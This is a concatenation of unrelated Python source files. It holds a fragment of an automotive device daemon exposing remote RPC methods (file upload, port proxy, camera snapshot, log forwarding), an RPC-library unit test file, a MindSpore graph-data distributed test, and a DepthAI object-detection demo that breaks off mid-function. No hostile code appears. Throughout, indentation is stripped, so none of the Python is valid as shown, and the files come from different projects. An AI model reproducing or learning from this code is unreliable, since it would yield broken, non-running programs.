@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_git_remote(),
"branch": get_git_branch(),
"commit": get_git_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0):
destination = {
"latitude": latitude,
"longitude": longitude,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
@dispatcher.add_method
def listDataDirectory():
files = [os.path.relpath(os.path.join(dp, f), ROOT) for dp, dn, fn in os.walk(ROOT) for f in fn]
return files
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
return [item._asdict() for item in list(upload_queue.queue)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# return logs in order they should be sent
# excluding most recent (active) log file
return sorted(logs[:-1])
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop()
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.wc_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
ws.send(data)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def manage_tokens(api):
if not TICI:
return
try:
params = Params()
mapbox = api.get(f"/v1/tokens/mapbox/{api.dongle_id}/", timeout=5.0, access_token=api.get_token())
if mapbox.status_code == 200:
params.put("MapboxToken", mapbox.json()["token"])
else:
params.delete("MapboxToken")
except Exception:
cloudlog.exception("Failed to update tokens")
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
manage_tokens(api)
conn_retries = 0
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
#params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
#params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
test_eider.py
|
# Copyright 2017 Semiconductor Components Industries LLC (d/b/a "ON
# Semiconductor")
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
test_eider
~~~~~~~~~~
Unit tests for eider.
"""
from asyncio import (
CancelledError, coroutine, get_event_loop, Future, new_event_loop, sleep)
from functools import reduce
from gc import collect
from inspect import signature
from numbers import Number
from operator import mul
from os import environ
from sys import version_info
from threading import Thread
from time import sleep as time_sleep
try:
from typing import Callable
except ImportError:
class Callable:
pass
from pytest import fixture, raises
from eider import (
async_for, BlockingConnection, Connection, LocalObject, LocalRoot,
OBJECT_ID, RemoteError, serve, unmarshal_signature)
PORT = 12345
URL = 'ws://localhost:{}/'.format(PORT)
WS_LIB = environ.get('EIDER_PY_WS_LIB', 'aiohttp')
if version_info >= (3, 6):
# Python 3.6 has async comprehensions
exec("""async def aiter2list(it):
them = await it
return [x async for x in them]
""")
elif version_info >= (3, 5):
# Python 3.5 has 'async for'
exec("""async def aiter2list(it):
them = await it
xs = []
async for x in them:
xs.append(x)
return xs
""")
else:
# Python 3.4 doesn't have built-in support for async iterators
@coroutine
def aiter2list(it):
them = yield from it
xs = []
yield from async_for(them, coroutine(xs.append))
return xs
class Value(LocalObject):
"""Represents a numeric value."""
def __init__(self, lsession, x):
super().__init__(lsession)
self._x = x
def val(self):
return self._x
@coroutine
def set_val(self, x):
self._x = (yield from get_value(x))
@coroutine
def add(self, x):
"""Add another value to the value."""
self._x += (yield from get_value(x))
@coroutine
def subtract(self, x):
self._x -= (yield from get_value(x))
@coroutine
def multiply(self, x):
self._x *= (yield from get_value(x))
@coroutine
def divide(self, x):
self._x /= (yield from get_value(x))
@coroutine
def get_value(x):
# x may be a number, a local Value, or a remote Value
if isinstance(x, Number):
return x # number
else:
x = x.val()
if isinstance(x, Number):
return x # local Value
else:
return (yield from x) # remote Value
class Range(LocalObject):
def __init__(self, lsession, start, stop):
super().__init__(lsession)
self._start = start
self._stop = stop
def iter(self):
return self
def next(self):
i = self._start
if i >= self._stop:
return {'done': True}
self._start = i + 1
return {'value': i}
class Sequence(LocalObject):
def __init__(self, lsession, seq):
super().__init__(lsession)
self._seq = seq
def get(self, i):
return self._seq[i]
class API(LocalRoot):
_newables = [Value, Range, Sequence]
def num_objects(self):
return len(self._lsession.objects)
def call(self, f, *args):
return f(*args)
def store_cb(self, cb):
self.cb = cb
def call_cb(self, *args):
return self.cb(*args)
def passthru(self, x):
return x
def native(self, x):
return NativeObject(x)
class LocalAPI(API):
def product(self, *args):
return reduce(mul, args)
def square(self, x):
return x * x
class RemoteAPI(API):
target = None
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if RemoteAPI.target is None:
RemoteAPI.target = Future(loop=self._lsession.conn.loop)
self._cancelled = Future(loop=self._lsession.conn.loop)
def sum(self, *args):
return sum(args)
def cancellable(self):
def on_done(fut):
self._cancelled.set_result(fut.cancelled())
fut = Future(loop=self._lsession.conn.loop)
fut.add_done_callback(on_done)
return fut
@coroutine
def cancelled(self):
return (yield from self._cancelled)
@coroutine
def map(self, f: 'Callable', xs: list, async_=True) -> list:
if async_:
ys = []
for x in xs:
ys.append((yield from f(x)))
return ys
else:
return list(map(f, xs))
def getattr(self, obj, attr):
with obj as o:
return getattr(o, attr)
def set_target(self):
RemoteAPI.target.set_result(self._lsession.conn)
@coroutine
def bridge(self):
rconn = yield from RemoteAPI.target
bridge = yield from self._lsession.create_bridge(rconn)
return bridge
class TargetAPI(API):
def join(self, s, xs):
return s.join(xs)
class NativeObject:
def __init__(self, x):
self.x = x
def add(self, x):
self.x += x
def get(self):
return self.x
def native_function(s):
return s + ' native'
@fixture(scope='module')
def server():
t = Thread(target=serve,
args=[PORT, new_event_loop()],
kwargs={'root': RemoteAPI,
'handle_signals': False,
'ws_lib': WS_LIB},
daemon=True)
t.start()
# wait a bit to make sure the server is established (websockets is slower
# than aiohttp)
time_sleep(0.1)
@fixture(scope='module')
def conn(server):
with BlockingConnection(URL, root=LocalAPI, ws_lib=WS_LIB) as conn:
yield conn
@fixture(scope='module')
def conn_async(server):
conn = Connection(URL, root=LocalAPI, ws_lib=WS_LIB)
try:
yield conn
finally:
conn.close()
get_event_loop().run_until_complete(conn.wait_closed())
@fixture
def lroot(conn):
with conn.create_local_session() as lroot:
yield lroot
@fixture
def rroot(conn):
with conn.create_session() as rroot:
yield rroot
@fixture
def rroot_async(conn_async):
session = get_event_loop().run_until_complete(conn_async.create_session())
with session as rroot:
yield rroot
@fixture
def rroot_codec(conn):
with conn.create_session('json', 'json') as rroot:
yield rroot
@fixture
def rroot_msgpack(conn):
with conn.create_session('msgpack', 'msgpack') as rroot:
yield rroot
@fixture(scope='module')
def conn_msgpack(server):
with BlockingConnection(
URL, lformat='msgpack', ws_lib=WS_LIB) as conn:
yield conn
@fixture
def rroot_bin(conn_msgpack):
with conn_msgpack.create_session() as rroot:
yield rroot
@fixture(scope='module')
def target(server):
def run():
@coroutine
def receive():
conn = Connection(URL, loop, root=TargetAPI, ws_lib=WS_LIB)
session = yield from conn.create_session()
with session as rroot:
yield from rroot.set_target()
yield from conn.wait_closed()
loop = new_event_loop()
loop.run_until_complete(receive())
Thread(target=run, daemon=True).start()
@fixture
def broot(rroot, target):
with rroot.bridge() as broot:
yield broot
def test_call(rroot):
"""Call a remote method."""
assert 17 == rroot.sum(3, 5, 9)
def test_call_async(rroot_async):
"""Call a remote method asynchronously."""
@coroutine
def test():
return (yield from rroot_async.sum(33, 55, 99))
assert 187 == get_event_loop().run_until_complete(test())
def test_cancel(rroot_async):
"""Cancel a remote method call."""
loop = get_event_loop()
fut = rroot_async.cancellable()
loop.call_soon(fut.cancel)
with raises(CancelledError):
loop.run_until_complete(fut)
assert loop.run_until_complete(rroot_async.cancelled())
def test_call_codec(rroot_codec):
"""Call using separately-encoded message bodies."""
assert 42 == rroot_codec.sum(24, 10, 8)
def test_new(rroot):
"""Create a remote object."""
assert 2 == rroot.new_Value(2).val()
def test_prop(rroot):
"""Set a remote property."""
rval = rroot.new_Value(2)
rval.val = 4
assert 4 == rval.val()
def test_prop_auto(rroot):
"""Create a new remote property."""
rval = rroot.new_Value(3)
rval.extra = 5
assert 5 == rval.extra()
def test_prop_auto_forbidden(rroot):
"""Assign to a forbidden remote property."""
rval = rroot.new_Value(4)
with raises(AttributeError):
rval.release = 6
def test_error_notfound(rroot):
"""Call a nonexistent remote method."""
with raises(AttributeError):
rroot.foo(42)
def test_error_runtime(rroot):
"""Call a remote method that raises an exception."""
with raises(ZeroDivisionError) as exc_info:
rroot.new_Value(42).divide(0)
assert isinstance(exc_info.value.__cause__, RemoteError)
def test_refcount(rroot):
"""Release a remote object."""
n = rroot.num_objects()
with rroot.new_Value(0):
assert n + 1 == rroot.num_objects()
assert n == rroot.num_objects()
def test_gc(rroot):
"""Garbage-collect a remote object."""
n = rroot.num_objects()
rval = rroot.new_Value(0)
assert n + 1 == rroot.num_objects()
del rval
# Make sure RemoteObject._close() (triggered by RemoteObject.__del__)
# completes. This may take several calls to gc.collect() on PyPy.
for _ in range(10):
collect()
get_event_loop().run_until_complete(sleep(0.1))
if n == rroot.num_objects():
break
else:
assert False
def test_with(rroot):
"""Try to access a remote object after it has been released."""
with rroot.new_Value(42) as rval:
rval.add(1)
with raises(LookupError):
rval.val()
if version_info >= (3, 5):
def test_async_with(rroot_async):
"""Try to access an async remote object after it has been released."""
locals = {}
exec("""async def test(rroot_async):
async with (await rroot_async.new_Value(42)) as rval:
await rval.add(1)
with raises(LookupError):
await rval.val()
""", globals(), locals)
get_event_loop().run_until_complete(locals['test'](rroot_async))
def test_session(conn):
"""Try to access a remote object after its session has been closed."""
with conn.create_session() as rroot:
rval = rroot.new_Value(0)
with raises(LookupError):
rval.val()
def test_iter(rroot):
"""Iterate over a remote object."""
assert [3, 4, 5, 6] == [x for x in rroot.new_Range(3, 7)]
def test_iter_async(rroot_async):
"""Iterate over a remote object asynchronously."""
assert [38, 39, 40, 41] == get_event_loop().run_until_complete(
aiter2list(rroot_async.new_Range(38, 42)))
def test_iter_seq(rroot):
"""Iterate over a remote sequence."""
seq = ['foo', 'bar', 42, 'spam']
assert seq == [x for x in rroot.new_Sequence(seq)]
def test_iter_seq_async(rroot_async):
"""Iterate over a remote sequence asynchronously."""
seq = ['foo', 'baz', 99, 'eggs']
assert seq == get_event_loop().run_until_complete(
aiter2list(rroot_async.new_Sequence(seq)))
def test_help_object(rroot):
"""Get documentation for a remote object."""
assert "Represents a numeric value." == rroot.new_Value(42).help()
def test_help_method(rroot):
"""Get documentation for a remote method."""
assert "Add another value to the value." == rroot.new_Value(42).add.help()
def test_dir(rroot):
"""List remote object's methods."""
assert """add addref dir divide help multiply release set_val signature
subtract taxa val""".split() == rroot.new_Value(42).dir()
def test_taxa(rroot):
"""List remote object's base classes."""
assert ['RemoteAPI', 'API'] == rroot.taxa()
def test_signature(rroot):
"""Get type signature for a remote method."""
sig = rroot.map.signature()
assert {
'defaults': {'async_': True},
'params': [['f', 'Callable'], ['xs', 'list'], ['async_', None]],
'return': 'list'
} == sig
# test unmarshal_signature as well
def g(f: 'Callable', xs: list, async_=True) -> list:
pass
assert signature(g) == unmarshal_signature(sig)
def test_callback_async(lroot, rroot):
"""Call a local method remotely, without remote post-processing."""
assert 135 == rroot.call(lroot.product, 3, 5, 9)
def test_callback_sync(lroot, rroot):
"""Call a local method remotely, with remote post-processing."""
assert [1, 4, 9, 16] == rroot.map(lroot.square, [1, 2, 3, 4])
def test_callback_error_async(lroot, rroot):
"""Call an exception-raising local method remotely, without remote
post-processing."""
with raises(ZeroDivisionError):
rroot.call(lroot.new_Value(42).divide, 0)
def test_callback_error_sync(lroot, rroot):
"""Call an exception-raising local method remotely, with remote
post-processing."""
lval = lroot.new_Value(42)
with raises(ZeroDivisionError):
rroot.map(lval.divide, [3, 1, 0, 7])
def test_callfront(rroot):
"""Call a remote method remotely."""
assert 66 == rroot.call(rroot.sum, 42, 24)
def test_rmarshal(rroot):
"""Return a remote method from a remote call."""
assert 42 == rroot.getattr(rroot, 'sum')(19, 10, 13)
def test_lmarshal(lroot, rroot):
"""Return a local method from a remote call."""
assert 120 == rroot.getattr(lroot, 'product')(8, 5, 3)
def test_lobject(lroot, rroot):
"""Pass a local object to a remote call."""
with lroot.new_Value(3) as lval, rroot.new_Value(4) as rval:
rval.add(lval)
assert 7 == rval.val()
def test_native_lmarshal(rroot):
"""Pass a local native object to a remote call."""
n = NativeObject(42)
assert n is rroot.passthru(n)
assert native_function is rroot.passthru(native_function)
def test_native_rmarshal(rroot):
"""Return a remote native object from a remote call."""
rn = rroot.native(99)
rn.add(1)
assert 100 == rn.get()
def test_native_callback(rroot):
"""Call a native method remotely."""
n = NativeObject(42)
rroot.call(n.add, 3)
assert 45 == n.x
def test_native_callback_function(rroot):
"""Call a native function remotely."""
assert 'gone native' == rroot.call(native_function, 'gone')
def test_native_callback_lambda(rroot):
"""Call an anonymous native function remotely."""
x = []
rroot.store_cb(lambda y: x.append(y))
rroot.call_cb(42)
assert [42] == x
def test_bridge(broot):
"""Call a bridged method locally."""
assert 'bridges are neat' == broot.join(' ',
'bridges are neat'.split())
def test_bridge_session(rroot, target):
"""Try to access a bridged object after its bridge has been closed."""
with rroot.bridge() as broot:
bval = broot.new_Value(0)
with raises(LookupError):
bval.val()
def test_bridge_error(broot):
"""Call a bridged method that raises an exception."""
with raises(ZeroDivisionError):
broot.new_Value(42).divide(0)
def test_bridge_callback(lroot, broot):
"""Call a local method across a bridge."""
assert 36 == broot.call(lroot.product, 3, 6, 2)
def test_bridge_callfront(broot):
"""Call a bridged method across a bridge."""
assert 'a+b+c' == broot.call(broot.join, '+', 'abc')
def test_msgpack(rroot_msgpack):
"""Call using msgpack codec."""
assert 11 == rroot_msgpack.sum(67, -59, 3)
def test_msgpack_binary(rroot_msgpack):
"""Pass binary data using msgpack."""
buf = bytes(range(7))
assert buf == rroot_msgpack.passthru(buf)
def test_msgpack_primary(rroot_bin):
"""Call with msgpack as the primary format."""
assert 176 == rroot_bin.sum(3, 14, 159)
def test_marshal_outofband(rroot_msgpack):
"""Marshal object references out of band."""
with rroot_msgpack.new_Value(6) as six:
with rroot_msgpack.new_Value(11) as eleven:
eleven.add(six)
assert 17 == eleven.val()
def test_pass_oid(rroot_msgpack):
"""Pass dict with special "__*__" key (only works with out-of-band
codecs)."""
obj = {OBJECT_ID: 42, "rsid": 99}
assert obj == rroot_msgpack.passthru(obj)
|
test_graphdata_distributed.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import random
import time
from multiprocessing import Process
import numpy as np
import mindspore.dataset as ds
from mindspore import log as logger
from mindspore.dataset.engine import SamplingStrategy
DATASET_FILE = "../data/mindrecord/testGraphData/testdata"
def graphdata_startserver(server_port):
"""
start graphdata server
"""
logger.info('test start server.\n')
ds.GraphData(DATASET_FILE, 1, 'server', port=server_port)
class RandomBatchedSampler(ds.Sampler):
# RandomBatchedSampler generate random sequence without replacement in a batched manner
def __init__(self, index_range, num_edges_per_sample):
super().__init__()
self.index_range = index_range
self.num_edges_per_sample = num_edges_per_sample
def __iter__(self):
indices = [i+1 for i in range(self.index_range)]
# Reset random seed here if necessary
# random.seed(0)
random.shuffle(indices)
for i in range(0, self.index_range, self.num_edges_per_sample):
# Drop reminder
if i + self.num_edges_per_sample <= self.index_range:
yield indices[i: i + self.num_edges_per_sample]
class GNNGraphDataset():
def __init__(self, g, batch_num):
self.g = g
self.batch_num = batch_num
def __len__(self):
# Total sample size of GNN dataset
# In this case, the size should be total_num_edges/num_edges_per_sample
return self.g.graph_info()['edge_num'][0] // self.batch_num
def __getitem__(self, index):
# index will be a list of indices yielded from RandomBatchedSampler
# Fetch edges/nodes/samples/features based on indices
nodes = self.g.get_nodes_from_edges(index.astype(np.int32))
nodes = nodes[:, 0]
neg_nodes = self.g.get_neg_sampled_neighbors(
node_list=nodes, neg_neighbor_num=3, neg_neighbor_type=1)
nodes_neighbors = self.g.get_sampled_neighbors(node_list=nodes, neighbor_nums=[
2, 2], neighbor_types=[2, 1], strategy=SamplingStrategy.RANDOM)
neg_nodes_neighbors = self.g.get_sampled_neighbors(node_list=neg_nodes[:, 1:].reshape(-1), neighbor_nums=[2, 2],
neighbor_types=[2, 1], strategy=SamplingStrategy.EDGE_WEIGHT)
nodes_neighbors_features = self.g.get_node_feature(
node_list=nodes_neighbors, feature_types=[2, 3])
neg_neighbors_features = self.g.get_node_feature(
node_list=neg_nodes_neighbors, feature_types=[2, 3])
return nodes_neighbors, neg_nodes_neighbors, nodes_neighbors_features[0], neg_neighbors_features[1]
def test_graphdata_distributed():
"""
Test distributed
"""
ASAN = os.environ.get('ASAN_OPTIONS')
if ASAN:
logger.info("skip the graphdata distributed when asan mode")
return
logger.info('test distributed.\n')
server_port = random.randint(10000, 60000)
p1 = Process(target=graphdata_startserver, args=(server_port,))
p1.start()
time.sleep(5)
g = ds.GraphData(DATASET_FILE, 1, 'client', port=server_port)
nodes = g.get_all_nodes(1)
assert nodes.tolist() == [101, 102, 103, 104, 105, 106, 107, 108, 109, 110]
row_tensor = g.get_node_feature(nodes.tolist(), [1, 2, 3])
assert row_tensor[0].tolist() == [[0, 1, 0, 0, 0], [1, 0, 0, 0, 1], [0, 0, 1, 1, 0], [0, 0, 0, 0, 0],
[1, 1, 0, 1, 0], [0, 0, 0, 0, 1], [0, 1, 0, 0, 0], [0, 0, 0, 1, 1],
[0, 1, 1, 0, 0], [0, 1, 0, 1, 0]]
assert row_tensor[2].tolist() == [1, 2, 3, 1, 4, 3, 5, 3, 5, 4]
edges = g.get_all_edges(0)
assert edges.tolist() == [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40]
features = g.get_edge_feature(edges, [1, 2])
assert features[0].tolist() == [0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0,
0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0]
nodes_pair_list = [(101, 201), (103, 207), (204, 105), (108, 208), (110, 210), (202, 102), (201, 107), (208, 108)]
edges = g.get_edges_from_nodes(nodes_pair_list)
assert edges.tolist() == [1, 9, 31, 17, 20, 25, 34, 37]
batch_num = 2
edge_num = g.graph_info()['edge_num'][0]
out_column_names = ["neighbors", "neg_neighbors", "neighbors_features", "neg_neighbors_features"]
dataset = ds.GeneratorDataset(source=GNNGraphDataset(g, batch_num), column_names=out_column_names,
sampler=RandomBatchedSampler(edge_num, batch_num), num_parallel_workers=4,
python_multiprocessing=False)
dataset = dataset.repeat(2)
itr = dataset.create_dict_iterator(num_epochs=1, output_numpy=True)
i = 0
for data in itr:
assert data['neighbors'].shape == (2, 7)
assert data['neg_neighbors'].shape == (6, 7)
assert data['neighbors_features'].shape == (2, 7)
assert data['neg_neighbors_features'].shape == (6, 7)
i += 1
assert i == 40
if __name__ == '__main__':
test_graphdata_distributed()
|
depthai_combination.py
|
"""
Spatial AI demo combining Spectacular AI VIO with Tiny YOLO object detection
accelerated on the OAK-D.
Requirements:
pip install opencv-python matplotlib
To download the pre-trained NN model run following shell script (Git Bash recommended on Windows to run it):
./depthai_combination_install.sh
Plug in the OAK-D and run:
python examples/depthai_combination.py
"""
import depthai as dai
import time
import cv2
import matplotlib.pyplot as plt
import spectacularAI
import threading
from pathlib import Path
import sys
import numpy as np
def make_pipelines(nnBlobPath, showRgb):
syncNN = True
# Create pipeline
pipeline = dai.Pipeline()
vio_pipeline = spectacularAI.depthai.Pipeline(pipeline)
# Define sources and outputs
camRgb = pipeline.createColorCamera()
spatialDetectionNetwork = pipeline.createYoloSpatialDetectionNetwork()
if showRgb:
xoutRgb = pipeline.createXLinkOut()
xoutNN = pipeline.createXLinkOut()
xoutBoundingBoxDepthMapping = pipeline.createXLinkOut()
if showRgb:
xoutRgb.setStreamName("rgb")
xoutNN.setStreamName("detections")
xoutBoundingBoxDepthMapping.setStreamName("boundingBoxDepthMapping")
# Properties
camRgb.setPreviewSize(416, 416)
camRgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
camRgb.setInterleaved(False)
camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.BGR)
spatialDetectionNetwork.setBlobPath(nnBlobPath)
spatialDetectionNetwork.setConfidenceThreshold(0.5)
spatialDetectionNetwork.input.setBlocking(False)
spatialDetectionNetwork.setBoundingBoxScaleFactor(0.5)
spatialDetectionNetwork.setDepthLowerThreshold(100)
spatialDetectionNetwork.setDepthUpperThreshold(5000)
# Yolo specific parameters
spatialDetectionNetwork.setNumClasses(80)
spatialDetectionNetwork.setCoordinateSize(4)
spatialDetectionNetwork.setAnchors(np.array([10,14, 23,27, 37,58, 81,82, 135,169, 344,319]))
spatialDetectionNetwork.setAnchorMasks({ "side26": np.array([1,2,3]), "side13": np.array([3,4,5]) })
spatialDetectionNetwork.setIouThreshold(0.5)
camRgb.preview.link(spatialDetectionNetwork.input)
if showRgb:
if syncNN:
spatialDetectionNetwork.passthrough.link(xoutRgb.input)
else:
camRgb.preview.link(xoutRgb.input)
spatialDetectionNetwork.out.link(xoutNN.input)
spatialDetectionNetwork.boundingBoxMapping.link(xoutBoundingBoxDepthMapping.input)
vio_pipeline.stereo.depth.link(spatialDetectionNetwork.inputDepth)
return pipeline, vio_pipeline
def make_tracker():
"""
Simple tracker/smoother/clustring for the YOLO-detected objects.
(The raw YOLO results look quite, well, raw, especially in 3D)
"""
tracked_objects = []
next_id = 1
class TrackedObject:
def __init__(self, t, p, l):
self.position = p
self.label = l
self.last_seen = t
self.n_detections = 1
nonlocal next_id
self.id = next_id
next_id += 1
def update(self, other):
UPDATE_ALPHA = 0.2
self.last_seen = other.last_seen
self.position = UPDATE_ALPHA * other.position + (1.0 - UPDATE_ALPHA) * self.position
self.n_detections += 1
def __repr__(self):
return '%s %d' % (self.label, self.id)
CLUSTERING_DISTANCE_AT_1M = 0.3
def find_best_match(new_obj, w_to_c_mat):
best = None
best_dist = CLUSTERING_DISTANCE_AT_1M
MIN_DEPTH = 0.5
local_pos = lambda p: (w_to_c_mat @ np.array(list(p) + [1]))[:3]
